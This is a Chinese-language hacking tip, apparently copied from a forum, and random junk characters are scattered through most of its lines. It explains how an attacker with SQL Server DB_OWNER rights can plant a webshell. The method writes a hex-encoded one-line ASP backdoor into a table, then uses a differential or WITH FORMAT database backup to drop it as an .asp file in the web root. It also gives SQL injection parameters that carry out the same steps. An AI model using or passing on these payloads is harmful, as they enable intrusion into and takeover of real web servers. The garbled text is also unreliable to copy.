DB_OWNER权限得到webshell的两点改进:
u! _% f* z) v1 W
. t, ~( ~& t3 k减少备份文件大小,得到可执行的webshell成功率提高不少* h% _- N# e6 s3 d E) B
一利用差异备份) m) h( N: Q; ]7 G7 M6 Q e
加一个参数WITH DIFFERENTIAL- w1 R, h1 B8 R6 S5 Z
! K- ?. {/ _7 }. Z7 Z5 `
1. p5 P! y8 ^, v: ^
2
+ q2 _. `- d& \$ R. D3
3 Y$ i( I$ ^: n9 g4
; d4 ~2 Q( ^1 i4 Z: G: D5 [! i declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s% H, B0 E# T" c# l- H
create table [dbo].[xiaolu] ([cmd] [image]);
. m; q! j& F( {( M# a. q. ]insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
; Z# t# J5 F0 s2 B- r4 |9 ddeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
W y1 i3 E: O, E* `
3 a# b a% }9 q0 I4 {7 ^二利用完全FORMAT9 K# w5 C! d/ g5 ?, R1 r
加一个参数WITH FROMAT, c9 P/ Y/ U4 t( C1 U
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
3 J8 @3 y8 j' A: H( ~1 u9 O, ^& N+ O) R9 R/ v
1& Z0 L6 d- _6 P
2
2 l2 e1 i$ Z- [* j7 k7 U3 ?33 j/ D/ j8 {1 C0 f
4: y1 A: h1 X) e! H1 C
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
' e/ w- O0 b+ N+ o9 ucreate table [dbo].[xiaolu] ([cmd] [image]);
, R4 r+ j! ~, g, Xinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)8 V6 C1 \" ?4 I* |/ D3 s5 k7 M3 k
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT * N( I4 I% S2 f& N4 ]# b
0 K6 \$ S; ^1 N0 T6 L" j) q. @# o总的来说就是那么简单几句,下面以备份数据库model为例子; \* T1 E. X, l6 _8 \
1
' z. M" `+ l9 ~5 P6 W( Y* ~% e) {" F: R- T, l% T. p( `3 G
1
# G& G# y# q! e# N6 E. Z3 f$ V' [ id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>') ( Y; \* n3 ~# P5 z' j) I4 i, O
( c" f0 W2 v, I/ |5 u2* I" c$ I( `: s4 s3 _- Q
% U$ J6 e' R( @6 e- Z/ X1 N# w; c7 ?
1
( y2 c% b# I! ^& F# e3 } id=1;backup database model to disk='你的路径‘ with differential,format;-- 6 Y* j4 M+ m: _. B& z& s) ^
|